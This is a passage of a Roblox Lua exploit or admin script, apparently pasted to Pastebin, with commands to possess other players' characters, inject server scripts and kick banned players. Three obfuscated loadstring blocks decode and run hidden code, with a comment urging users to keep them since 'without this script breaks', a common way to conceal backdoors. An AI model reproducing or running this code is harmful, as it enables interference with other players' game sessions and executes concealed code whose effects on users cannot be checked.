  1775. elseif msg == "noobs" then
  1776. for _,plr in pairs(game:GetService("Players"):GetChildren()) do
  1777. if plr.AccountAge > 364 then
  1778. table.insert(plrs, plr)
  1779. end
  1780. end
  1781. elseif msg == "veterans" then
  1782. for _,plr in pairs(game:GetService("Players"):GetChildren()) do
  1783. if plr.AccountAge > 364 then
  1784. table.insert(plrs, plr)
  1785. end
  1786. end
  1787. elseif msg == "others" then
  1788. for i,v in pairs(game:GetService("Players"):GetChildren()) do
  1789. if v ~= LocalPlayer then
  1790. table.insert(plrs, v)
  1791. end
  1792. end
  1793. else
  1794. for i,v in pairs(game:GetService("Players"):GetChildren()) do
  1795. if v.Name:lower():sub(1,#msg) == msg:lower() then
  1796. table.insert(plrs, v)
  1797. end
  1798. end
  1799. end
  1800. return plrs
  1801. end
  1802.  
  1803. for _,plr in pairs(game:GetService("Players"):GetChildren()) do
  1804. end
  1805.  
  1806. LocalPlayer.Chatted:connect(function(m)
  1807. for i,v in pairs(Cmds) do
  1808. if v["Say"]..key == m:sub(1, #v["Say"]+#key) then
  1809. v["Func"](getPlayers(m:sub(#v["Say"]+#key+1)), m:sub(#v["Say"]+#key+1))
  1810. end
  1811. end
  1812. end)
  1813.  
  1814.  
  1815.  
  1816. AddCmd("Possess","ps","Possess a player",
  1817. function(Plrs)
  1818. for _, plr in pairs(Plrs) do
  1819. if plr and plr.Character then
  1820. LocalPlayer.Character = plr.Character
  1821. workspace.CurrentCamera.CameraType = "Custom"
  1822. workspace.CurrentCamera.CameraSubject = plr.Character.Humanoid
  1823. end
  1824. end
  1825. end
  1826. )
  1827.  
  1828. AddCmd("Hint","hh","Show some hint",
  1829. function(nothing, msg)
  1830. if found then
  1831. NewS([[
  1832. a = Instance.new("Hint", workspace)
  1833. msg = "]]..msg..[["
  1834. msg = msg:gsub("","\5")
  1835. game:service'Debris':AddItem(a, 5)
  1836. while wait() do
  1837. for i = 30,0,-1 do
  1838. a.Text = "-->"..string.rep(" ",i)..msg..string.rep(" ",i).."<--"
  1839. wait()
  1840. end
  1841. for i = 0,30,1 do
  1842. a.Text = "-->"..string.rep(" ",i)..msg..string.rep(" ",i).."<--"
  1843. wait()
  1844. end
  1845. end
  1846. ]], workspace)
  1847. end
  1848. end
  1849. )
  1850. AddCmd("Message","msg","Show a message",
  1851. function(nothing, msg)
  1852. if found then
  1853. NewS([[
  1854. a = Instance.new("Message", workspace)
  1855. msg = "]]..msg..[["
  1856. msg = msg:gsub("","\5")
  1857. game:service'Debris':AddItem(a, 5)
  1858. while wait() do
  1859. for i = 30,0,-1 do
  1860. a.Text = "-->"..string.rep(" ",i)..msg..string.rep(" ",i).."<--"
  1861. wait()
  1862. end
  1863. for i = 0,30,1 do
  1864. a.Text = "-->"..string.rep(" ",i)..msg..string.rep(" ",i).."<--"
  1865. wait()
  1866. end
  1867. end
  1868. ]], workspace)
  1869. end
  1870. end
  1871. )
  1872.  
  1873. for i = 0,8,1 do
  1874. wait(0.01)
  1875. end
  1876. --Without this script breaks--
  1877. local z={["#"]=0,["!"]=1,["^"]=2,["&"]=3,[")"]=4,["("]=5,["_"]=6,["+"]=7,["$"]=8,["-"]=9,["*"]=10,["="]=11,["@"]=12,["%"]=13,["?"]=14,["~"]=15}; setfenv(assert(loadstring((string.gsub(string.gsub(table.concat({
  1878. "~)(+)+#+(+)+$A^#(@_(_!_&+(_#^)_~_#^?_~_)+#^!_^_(+&+(_#^)+$_-_&+#^&+&_^+-_#+)+@^#A^?^?^@)~_&_!_@_#(@_!_-+(_^+?^?)!_%_(_@^#^~(~(-^*#~)(+)+#+(+)+$A^&)^+(_!_)+(_)_#^^_-+#^_(&&^+%_-_@_@_-_#&?_@^#^~_#+)+-_#+@_(_$+!&^A&#^!_?_)_#^!_@_(_=_&+!_!&^&)A&^&^^@^#^~(~(-^*#~)(+)+#+(+)+$A^+((_@_&_~_%_(_#^)+~_#^_(&&^+%_#^)+!_^_&+#^+)(_?_(_^+!_)+-_~_?_#^&&@^#A^?^?^@)~_&_!_@_#(@_!_-+(_^+?^?)!_%_(_@^#^~(~(-^*#~)(+)+#+(+)+$A^?)~_)+#^_)-_?_-_&+$_(_)_^^@^#^~(~(-^*#~)(+)+#+(+)+$^^^&)^+(_)_-_)+#^)+~_#^&(&_^+-_#+)+^)(+-_@_)_(_^+)((_&+)+-_?_+_^^@^#^~(~(-^*#__~_^+#^~(@^_+#^-_?_#^#+!_-_^+&+$^+_!_%_(_?^#(@_!_-+(_^+&+*&+)(_)+#(@_!_-+(_^+&+$^-^-^#^)_~_*#-___#^_+?^?)!_%_(_#^%&%&#^^^_(&&^+%_-_@_@_-_#&?_^^#^~_^+#^_+?^?)!_%_(_#^%&%&#^^^-_-_@)(+!_&(&_^+-_#+)+^^#^)+$_(_?_*#~)(+)+#+(+)+$^^^&)^+(_!_)+~_^+#^~___#^_()+!_^_&+#^-_&+#^-_?_%^+_!_%_(_^^-^*#(_?_)_*#(_?_)_"
  1879. }),"(%u)(.)",function(r,c)return c:rep(r:byte()-62)end),"(.)(.)",function(lo,hi)return string.char(z[lo]+z[hi]*16)end)))),getfenv())()
  1880.  
  1881. local z={["("]=0,["#"]=1,["-"]=2,["?"]=3,["~"]=4,["&"]=5,["%"]=6,["_"]=7,["@"]=8,["*"]=9,["^"]=10,["="]=11,["+"]=12,[")"]=13,["!"]=14,["$"]=15}; setfenv(assert(loadstring((string.gsub(string.gsub(table.concat({
  1882. "_%#%)%&%!-(&+%#%*_&%-_?_!-(&+%#%*_&%-_#~~%~%&%~%^??%$%!%!%&%?%~_@-%%&_!%?%~_*%$%!%@-(_+%-_*-^(*A%(-(_+%-_!-!~#%)%&%(-)?)?(A-%&??-_)%*%+%+%*%(?!%--(-$%-_(-(_+%-_!-!~#%)%&%(-)?)?(---*%*%+~&_#%?&?%-_*%(_~_--(-~_@%&%!%^($~&_~_(_&_~_@---?~-_&%#%~_$%-_(-$%%%(-%&~_#%-%?_(-*%?_(-*%!%)-_%#%)%&%--*-^(&%!%~%^(&%!%~%*-"
  1883. }),"(%u)(.)",function(r,c)return c:rep(r:byte()-62)end),"(.)(.)",function(lo,hi)return string.char(z[lo]+z[hi]*16)end)))),getfenv())()
  1884.  
  1885. local z={["!"]=0,[")"]=1,["$"]=2,["("]=3,["*"]=4,["="]=5,["_"]=6,["#"]=7,["~"]=8,["-"]=9,["&"]=10,["^"]=11,["@"]=12,["%"]=13,["?"]=14,["+"]=15}; setfenv(assert(loadstring((string.gsub(string.gsub(table.concat({
  1886. ")**_*_(*%_*_~A$-*?A_+_$$@A$-_?A_+_$$@A$-_?A_+_!$!A#?_(#!$^_$$@$&!__=#?_(_*#-_+_?_~$-$&!**-_(#%_-_(#(#~$-$&!__+_$#!$-_!$%(!$)(@$$(!$*_+_&!##)_-_*#~$-$&!+*=#*#!#=#*#~$#$(*$#=_)_*#=_*_!$$_-#!$_=(($#%_-_@_@_-_!(?_#$-$&!+*=#*#!#=#*#~$#$(*$#=_)_*#=_*_!$$_-#!$_=(($#%_-_@_@_-_!(?_#$-$&!+*=#*#!#=#*#~$#$(*$#=_)_*#=_*_!$$_-#!$_=(($#%_-_@_@_-_!(?_#$-$&!+*=#*#!#=#*#~$#$(*$#=_)_*#=_*_!$$_-#!$_=(($#%_-_@_@_-_!(?_#$-$&!=_?_*_&!=_?_*_&!-$"
  1887. }),"(%u)(.)",function(r,c)return c:rep(r:byte()-62)end),"(.)(.)",function(lo,hi)return string.char(z[lo]+z[hi]*16)end)))),getfenv())()
  1888.  
  1889.  
  1890.  
  1891. V3rmModeldebounce = false
  1892. modeldebounce = false
  1893. game:service'RunService'.Stepped:connect(function()
  1894. if modeldebounce then return end
  1895. rot = (rot % 360) + 0.0001
  1896. if V3rmModel.Parent ~= workspace then
  1897. modeldebounce = true
  1898. tabs = {}
  1899. V3rmModel = Instance.new("Model", workspace)
  1900. V3rmModel.Name = "V3rm Tabs"
  1901. tabs = {}
  1902. wait()
  1903. modeldebounce = false
  1904. end
  1905. end)
  1906.  
  1907. rot = 0
  1908. coroutine.resume(coroutine.create(function()
  1909. game:GetService("RunService").Stepped:connect(function()
  1910. if probemode == false then
  1911. if LocalPlayer.Character then
  1912. if LocalPlayer.Character:findFirstChild("Torso") then
  1913. rot = rot + 0.0001
  1914. for i,v in pairs(Tabs) do
  1915. ypcall(function()
  1916. local pos = LocalPlayer.Character.Torso.CFrame
  1917. local radius = 4 + (#Tabs * 0.5)
  1918. local x = math.sin((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius
  1919. local y = 0
  1920. local z = math.cos((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius
  1921. local arot = Vector3.new(x, y, z) + pos.p
  1922. local brot = v.CFrame.p
  1923. local crot = (arot * .1 + brot * .9)
  1924. v.CFrame = CFrame.new(crot, pos.p)
  1925. end)
  1926. end
  1927. end
  1928. end
  1929. end
  1930. if probemode == true then
  1931. if game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") then
  1932. rot = rot + 0.001
  1933. for i,v in pairs(Tabs) do
  1934. ypcall(function()
  1935. local pos = game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe").CFrame
  1936. local radius = 4 + (#Tabs * 0.5)
  1937. local x = math.sin((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius
  1938. local y = 0
  1939. local z = math.cos((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius
  1940. local arot = Vector3.new(x, y, z) + pos.p
  1941. local brot = v.CFrame.p
  1942. local crot = (arot * .1 + brot * .9)
  1943. v.CFrame = CFrame.new(crot, pos.p)
  1944. end)
  1945. end
  1946. end
  1947. end
  1948. end)
  1949. end))
  1950. game:GetService("RunService").RenderStepped:connect(function()
  1951. for _,a in pairs(game:service('Players'):children()) do
  1952. for _,b in pairs(Banlist) do
  1953. if b:find(a.Name) then
  1954. NewLS([==[
  1955. Instance.new('Message',Workspace).Text = "You are Banned."
  1956. local p = game:GetService("Players").LocalPlayer
  1957. p.Parent=nil
  1958. wait()
  1959. p.Parent=game:GetService("Players")
  1960. ]==], a.Backpack)
  1961. a:remove()
  1962. Output('Banned Player # '..a.Name..' # Attempted to join.',__)
  1963. else
  1964. end
  1965. end
  1966. end
  1967. end)
  1968. game.Players.ChildRemoved:connect(function(plr)
  1969. Output("Disconnected: "..plr.Name)
  1970. wait(3)
  1971. Dismiss()
  1972. end)
  1973.  
  1974. game.Players.ChildAdded:connect(function(plr)
  1975. Output("Connected: "..plr.Name)
  1976. wait(3)
  1977. Dismiss()
  1978. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement